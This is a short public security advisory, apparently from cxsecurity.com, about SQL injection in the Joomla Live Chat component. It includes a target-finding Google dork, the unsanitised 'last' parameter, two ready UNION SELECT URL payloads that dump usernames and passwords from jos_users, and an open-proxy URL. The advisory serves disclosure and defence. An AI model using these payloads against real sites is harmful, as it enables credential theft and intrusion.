Joomla Live Chat SQL Injection

2009-07-30 / 2009-07-31
Credit: jdc
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

Joomla Live Chat http://www.joompolitan.com/livechat.html Google Dork: allinurl:option=com_livechat author: jdc SQL Injections: administrator/components/com_livechat/getChat.php && administrator/components/com_livechat/getSavedChatRooms.php don't sanitize the variable 'last': $last = (isset($_GET['last']) && $_GET['last'] != '') ? $_GET['last'] : 0; --------------------------------------------------------^ administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users Open Proxy ( sends HTTP_FORWARDED ): administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com

Referencje:

http://www.securityfocus.com/bid/32803
http://xforce.iss.net/xforce/xfdb/47304
http://www.milw0rm.com/exploits/7441
http://secunia.com/advisories/33122


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top